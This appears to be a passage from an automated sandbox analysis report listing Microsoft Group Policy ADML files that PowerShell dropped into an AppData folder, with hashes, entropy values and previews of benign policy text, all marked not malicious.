                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootScenarioCategory">Windows Boot Performance Diagnostics</string>.. <string id="BootScenarioExecutionPolicyExplain">Determines the execution level for Windows Boot Performance Diagnostics.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect Windows Boot Performance problems and attempt to determine their root causes. These root causes will be logged to the eve

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PerformancePerftrack.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                        Entropy (8bit):4.988086677223878
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yuh9J6k7LXp4qVacJPYidFV:cgeD5x8gm8fKVJ6kSuacFYidFV
                                                                                                                                                                                                        MD5:EF84A579BC8272236E53AB9F5BEE92CB
                                                                                                                                                                                                        SHA1:670EA5FF6A1559F695E15D3A2D17B2A100BA79B7
                                                                                                                                                                                                        SHA-256:82C7F47D059ED97EF6AC7068E43E6933E84ACE56543FD8C945065A51C0644A63
                                                                                                                                                                                                        SHA-512:92D8CC050A24AC9F2D059486A9EA5A8184FCC6798261F789E36F1A4694F379EC9EFA8CA69AF8D53502187B7D908850EB2233038BD22901D116195F32E0E8A937
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PerfTrackCategory">Windows Performance PerfTrack</string>.. <string id="PerfTrackScenarioExecutionPolicyExplain">This policy setting specifies whether to enable or disable tracking of responsiveness events.....If you enable this policy setting, responsiveness events are processed and aggregated. The aggregated data will be transmitted to Microsoft through SQM.....if you disable this policy setting, responsiveness events are not processed.....If you do not configure this policy setting, the DPS will enable Wind

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Power.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (389), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29740
                                                                                                                                                                                                        Entropy (8bit):4.822333468541642
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:EkJF7YAK1c67c5h9xRoKYy5V8iisCaeZou2Ap6:EkJF7YA0a9xR5V8iPCgu2Ap6
                                                                                                                                                                                                        MD5:C0E2A98755B3DA961DBBCFA1A621154B
                                                                                                                                                                                                        SHA1:878508DB646C47D8A36C90305D919C52CD8DC11C
                                                                                                                                                                                                        SHA-256:0F8B66F7B315426ABEC4B71912D2FF5F1F4A573AC391CD8E0A10738AF808F8A6
                                                                                                                                                                                                        SHA-512:AD72CA9823E3581557BE15F198F6BB697CEF9CC372881FED501DB236D6B35834A220603F4AB36FBEE65D36DF3473862F0AD93F9443EF82204F28130F635910E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ACCriticalSleepTransitionsDisable">Turn on the ability for applications to prevent sleep transitions (plugged in)</string>.. <string id="ACHibernateTimeOut">Specify the system hibernate timeout (plugged in)</string>.. <string id="ACPowerButtonAction">Select the Power button action (plugged in)</string>.. <string id="ACPromptForPasswordOnResume">Require a password when a computer wakes (plugged in)</string>.. <string id="ACSleepButtonAction">Select the Sleep button action (plugged in)</string>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PowerShellExecutionPolicy.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8601
                                                                                                                                                                                                        Entropy (8bit):4.7004620993687665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:wB3f/vzRzuppcRzhl5tWSLh2xwqmHfc9Ka7yOUpJD4mUQfStlm8hOE9m7pqHXSp3:ozRzu0P+uIxrmpn8mgtlm8B9mgc3
                                                                                                                                                                                                        MD5:6E1645BEEB36B67E2486DF156AD73713
                                                                                                                                                                                                        SHA1:96BF04C94854CBA227B3E3518A5BF6EEEEFFCA64
                                                                                                                                                                                                        SHA-256:1963DE8A3D77000A3DCF16B751132920F2F8ED0274905285C914469D1597F11D
                                                                                                                                                                                                        SHA-512:5A6D2DAEE84146D94A7D93640C92B14792C759D1E778C25BA3CA3B892628B87848EC414EC6DB709F6912B3E38397C608A343D719AF8B26169022FADBCF35DB79
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Windows PowerShell</displayName>.. <description>This file contains the configuration options for Windows PowerShell</description>.. <resources>.. <stringTable>.. <string id="AllScripts">Allow all scripts</string>.. <string id="AllScriptsSigned">Allow only signed scripts</string>.. <string id="EnableScripts">Turn on Script Execution</string>.. <string id="EnableScripts_Explain">This policy setting lets you configure the script execution policy, controlling which scripts are allowed to run.....If you enable this policy setting, the scripts selected in the drop-down list are allowed to run.....The "Allow only signed scripts" policy setting allows scripts to execute only if they are signed

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PreviousVersions.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5301
                                                                                                                                                                                                        Entropy (8bit):4.592135641503131
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmieohnx5hxncDmeoqCcxjBgAeocs7x7BNcGDQaFV:EBtx5h9zqCccQcs75BhDQan
                                                                                                                                                                                                        MD5:4DAE700A902336A7ACD9315F2DCB6F00
                                                                                                                                                                                                        SHA1:B472C8447E223252B2B43403D60468B62C3FFE2C
                                                                                                                                                                                                        SHA-256:DC5A3DE3D24654B83D269B2A74148B777261995A56ABAD7943616BBA648A28AE
                                                                                                                                                                                                        SHA-512:3C572957861E0FD9D62F51C8ED0DB407C7C20C1DBCD99B2F06F60DE19D31158367D03C8729E8EC0B41F983D7744F9FEADE91C4AE68434EFEBDF57F9BBC201D9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableBackupRestore">Prevent restoring previous versions from backups</string>.. <string id="DisableBackupRestore_Help">This policy setting lets you suppress the Restore button in the previous versions property page when the user has selected a previous version of a local file, in which the previous version is stored on a backup.....If you enable this policy setting, the Restore button is disabled when the user selects a previous version corresponding to a backup.....If you disable this policy setting, the Re

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Printing.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (568), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33066
                                                                                                                                                                                                        Entropy (8bit):4.630945231898182
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:YRG9T17KYkXyUrqDiynH2yi4oO+gwlquRfpxHkyT/yT/eaXl+H1CUnJi:tvmrrnlpxHkyedu1CUnw
                                                                                                                                                                                                        MD5:587143E4C31AF88A0591C34F205DB7FB
                                                                                                                                                                                                        SHA1:F6B86A1E88E2822BA2A595E6BD047BD04CCD5C0B
                                                                                                                                                                                                        SHA-256:90D12A7BC2ECAE124C62A43069FCD48E3AAA6F214325372EA82E5727F290D184
                                                                                                                                                                                                        SHA-512:ED01D954728347AA2A0DED6D0F351BDDD5C9CA0254802BCEED01104D5C5909342A15A6D628B4249782151E748514679822A169A3CC846722E1BA81A24D9EAAA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowWebPrinting">Activate Internet printing</string>.. <string id="AllowWebPrinting_Help">Internet printing lets you display printers on Web pages so that printers can be viewed, managed, and used across the Internet or an intranet..... If you enable this policy setting, Internet printing is activated on this server..... If you disable this policy setting or do not configure it, Internet printing is not activated..... Internet printing is an extension of Internet In

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Printing2.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (640), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14598
                                                                                                                                                                                                        Entropy (8bit):4.638367767119586
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:vPo4LQX7miuddCSgP71CTd5xZSq5ynxWmBIY+DOxH++JGQfFD:ox7Idu7Ih5xwqcJJrxPAM
                                                                                                                                                                                                        MD5:5BA865D69814055E09D5698701921315
                                                                                                                                                                                                        SHA1:E0F4F6C1D949A6E2B1A30D4397CED3C175A3F003
                                                                                                                                                                                                        SHA-256:28D160709A578AE08008CE9F84EFA853F0CD30C05AC418ED0085133B7F5BE4F8
                                                                                                                                                                                                        SHA-512:7A09CB06DAE4236124B0CDE8B8C4887C95CEAE97C1EEB8D632AFE142B4ED7BBA4DB52AE3BFF03253C9CE7C5242FD6E8894B74A7AB294BECA5B39429FCF09591F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>Printing Group Policies</displayName>.. <description>Printing Group Policies valid on all Windows flavors except ARM</description>.. <resources>.. <stringTable>.. <string id="RegisterSpoolerRemoteRpcEndPoint">Allow Print Spooler to accept client connections</string>.. <string id="RegisterSpoolerRemoteRpcEndPoint_Help">This policy controls whether the print spooler will accept client connections.....When the policy is unconfigured or enabled, the spooler will always accept client connections.....When the policy is disabled, the spooler will not accept client connections nor allow users to share printers. All printers current

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Programs.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7022
                                                                                                                                                                                                        Entropy (8bit):4.658208655049282
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmxKh8Wc3Ww1nZy8hmiZWV9k4W0DWivt2fpre9hWJT+K3AqcOrzqhScDMFsO:EU3RnY82DVYfUrWd+kxXc0sVcfu9q
                                                                                                                                                                                                        MD5:14D4B2677604A342B26891EFC3597078
                                                                                                                                                                                                        SHA1:A51EBAF7D5FCFF778B9AEDCE6F37C5C9D6B2B0EC
                                                                                                                                                                                                        SHA-256:5EE2DF374170A87F773008D43AEBEBEF3E1C451F0E9A530B6F2CD5C1601E0012
                                                                                                                                                                                                        SHA-512:DB06D2D412763EC3ACA0D03D4694E6D86C4149B57BD31EA91E8C0E0C3ED8C56B15FDBB2B3FB441D5DC3C5BD262FDE2543A27477FF32C2509473B87B5B10DEDEF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Programs">Programs</string>.. <string id="NoProgramsCPL">Hide the Programs Control Panel</string>.. <string id="NoProgramsCPL_Help">This setting prevents users from using the Programs Control Panel in Category View and Programs and Features in Classic View... ..The Programs Control Panel allows users to uninstall, change, and repair programs, enable and disable Windows Features, set program defaults, view installed updates, and purchase software from Windows Marketplace. Programs published or assigned to

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PswdSync.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4835
                                                                                                                                                                                                        Entropy (8bit):4.774670262203608
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmMM44GDFsil1oXY7XlMXC3K8GDFeMbiZC0XEV:EB4eFUXUXuy33eFPAX0
                                                                                                                                                                                                        MD5:81A4179A1F50B390A55CEC61B95F6752
                                                                                                                                                                                                        SHA1:1D21A6C288E6EB744C52CCAA2A81298CAB467B12
                                                                                                                                                                                                        SHA-256:5A277C91D697FECAEBECFD1AA4A38F6027C5800BFB4B5EBEBBA90251C788BEAB
                                                                                                                                                                                                        SHA-512:F79C992F4FA17D80A8B65F7AB9753DBBBC12295B80DBDAA3C71CE417B63F9B39774D4ABF5381FD45320E684728FBD05D3761FF37F53A26A3076DF20C3EA2DB71
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PswdSync">Password Synchronization</string>.. <string id="Psync_LoggingLevel">Turn on extensive logging for Password Synchronization</string>.. <string id="Psync_LoggingLevel_Help">This policy setting allows an administrator to turn on extensive logging for Password Synchronization.....If you enable this policy setting, all affected computers that are running Password Synchronization log intermediate steps for password synchronization attempts.....If you disable or do not configure this policy setting, in

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\QOS.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22100
                                                                                                                                                                                                        Entropy (8bit):4.777240545794819
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:S0I0F0I0w0i0O0Q0c0K0F1P0mDeWvyz0gx0YV0BI0l+0Xe0X:f+
                                                                                                                                                                                                        MD5:5A29BFD51F48A0377276834F0B8BAF80
                                                                                                                                                                                                        SHA1:E1F484C1462470950E95ADC7D7E4FC1A6FA273B6
                                                                                                                                                                                                        SHA-256:39B7A57E44813AFFEF1380FC4A2CE929EDAAAB031B457C50381A76996FD6B654
                                                                                                                                                                                                        SHA-512:DE4B16EDBAB62DEDF2AC48ABF223AE084B29A7DC6231507ECE14DF273CECA57F1E86C4C9AFAF0CE627394C6523E7D140A1A60E8E9B8D5D7FA93C57304BEE2AF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="QosDBMC_BestEffort_Help">Specifies an alternate Layer-3 Differentiated Services Code Point (DSCP) value for packets with the Best Effort service type (ServiceTypeBestEffort). The Packet Scheduler inserts the corresponding DSCP value in the IP header of the packets.....This setting applies only to packets that conform to the flow specification.....If you enable this setting, you can change the default DSCP value associated with the Best Effort service type.....If you disable this setting, the system uses the default

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\RPC.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (491), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13725
                                                                                                                                                                                                        Entropy (8bit):4.739504626052788
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EuPHdbK3t1tsbRP7MaC+9D29YVm8yvRyd4+gzsBUNh8yhXOLzUFoNP1npbNjtKjr:9vdew4argz4/gzsGbF5OLzQm1pFtcr
                                                                                                                                                                                                        MD5:C7D0520662B4D6F3A33CD02E7D078832
                                                                                                                                                                                                        SHA1:2092E311A0CDB5F1EDBFC9D3A39490EA6F061314
                                                                                                                                                                                                        SHA-256:A1595A8F7F77496CB3DAE9BA4A8787985FF7C5C7B50BCE6EA19ECC823B874C57
                                                                                                                                                                                                        SHA-512:0F23E0D8B3A0C3007C81794DEA01E218A6810AF134BB40DE84C7509BC2F82C0E6F919E4C2994C2964C977C9F7EC0DFB4456328C928C3A3A67B5EC1126152ACE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Rpc">Remote Procedure Call</string>.. <string id="RpcEEInfoOff">Off</string>.. <string id="RpcEEInfoOffWithExc">Off with Exceptions</string>.. <string id="RpcEEInfoOn">On</string>.. <string id="RpcEEInfoOnWithExc">On with Exceptions</string>.. <string id="RpcEnableAuthEpResolution">Enable RPC Endpoint Mapper Client Authentication</string>.. <string id="RpcEnableAuthEpResolution_Help">This policy setting controls whether RPC clients authenticate with the Endpoint Mapper Service when the

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\RacWmiProv.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1378
                                                                                                                                                                                                        Entropy (8bit):4.961792727852399
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3FNPKJAzSIveqsUA0j01oSxz1kFV:cgeD5x8gmYAkFVgeMFV
                                                                                                                                                                                                        MD5:B8793F540E47EE449A0369A0569CFB8A
                                                                                                                                                                                                        SHA1:3701D0618E2079A6EFDAD7748C21B6B236CD2070
                                                                                                                                                                                                        SHA-256:4BEFE402E1D8BAF094346887C509331398720109298EEB4DD947879DFE0A9216
                                                                                                                                                                                                        SHA-512:59C4192172AC1BF0278659B1876B3E71ECDD0FE4E2E6B0EC33796C75566F85C0BD1AD6FF5D3BC57382532D65CA3914982369F199781B1DC6E84C1B69CA517D32
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Reliability Analysis Component</displayName>.. <description>Reliability Analysis Component</description>.. <resources>.. <stringTable>.. <string id="RAC">Windows Reliability Analysis</string>.. <string id="ConfigureRacWmi">Configure Reliability WMI Providers</string>.. <string id="ConfigureRacWmi_help">This policy setting allows the Windows Management Instrumentation (WMI) providers Win32_ReliabilityStabilitymetrics and Win32_ReliabilityRecords to provide data to Reliability Monitor in the Action Center control panel, and to respond to WMI requests.....If you enable or do not configure this policy setting, the listed providers will resp

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Radar.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (563), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2714
                                                                                                                                                                                                        Entropy (8bit):4.801755208450146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKbFnok+9MKFLOL5dEyIsaVZ57O0BsYu+P4XEgV:LeD5pmnFnok+9RL+M5jVZ8CsuPeV
                                                                                                                                                                                                        MD5:64AFB930E79CDCDF1D967B37180DEC5C
                                                                                                                                                                                                        SHA1:AA45CC6BCA49EF263EC3880FFE65F1C5D936CC70
                                                                                                                                                                                                        SHA-256:8C710DC3983ED5962C5F7D40C3390C660AE7597CEA71F2BF8FF68B6EFC594CB7
                                                                                                                                                                                                        SHA-512:BF40F01F07FB8674902D50A9C7B6C3636714B6C3E5FFC1D045689B46A63024379CB1FE45092FF98912E265433FD4A8970B4CCF539F1AA56831E2283231D55AC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Resource Exhaustion Detection and Resolution</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">Determines the execution level for Windows Resource Exhaustion Detection and Resolution.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ReAgent.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (483), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1817
                                                                                                                                                                                                        Entropy (8bit):4.807685062167235
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gmclqzPa520pns19F9K0SppRPRDdamFV:LeD5pmnvI3R9FV
                                                                                                                                                                                                        MD5:74A0325268266B2CDE0E3F5F1597F203
                                                                                                                                                                                                        SHA1:088E690A896920238445D6605ACBE4F40498742F
                                                                                                                                                                                                        SHA-256:11AB21A9F9176CBC644DBDC5020FA4791086234FB126A5F0885315EFD299BB35
                                                                                                                                                                                                        SHA-512:D79952DFB16CF46EF6D91DC4031CDAD7F7D060E92E16E18CECA3CA5B69F017C895FD54655F05F6CEE08C027CC3981BDA16F798726C69A39C95FF923D763B72F0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Recovery</displayName>.. <description>Recovery</description>.. <resources>.. <stringTable>.. <string id="WinRE">Recovery</string>.. <string id="ConfigureWinRESetup">Allow restore of system to default state</string>.. <string id="ConfigureWinRESetup_help"> Requirements: Windows 7.. Description: This policy setting controls whether users can access the options in Recovery (in Control Panel) to restore the computer to the original state or from a user-created system image..... If you enable or do not configure this policy setting, the items "Use a system image you created earlier to recover your computer" and "Reinstall Windows" (

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Reliability.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5310
                                                                                                                                                                                                        Entropy (8bit):4.781992069178365
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmAydEk3E7mEvPexos3w33I3tcGBQ4pdV:E8EkCmE3exoiO32tTBQy
                                                                                                                                                                                                        MD5:0B7DB39B4E35B6787C19C79280664C11
                                                                                                                                                                                                        SHA1:870AA05E92B4B0FACEC8EC4E7D8F5C428748A5A4
                                                                                                                                                                                                        SHA-256:3FC94A050B5B845BF0D21AB6D0718A5BC0FD292624A6AA4E7D8E06317DE34863
                                                                                                                                                                                                        SHA-512:6E9A356BCE00B25A998A0B63BF6C0B29521DE43DD155712A025311518DC212384C4599B48D403E3E1DD2580E3B5F1D6688930D7441A66488C6A7870EF3233F87
                                                                                                                                                                                                        Malicious:false
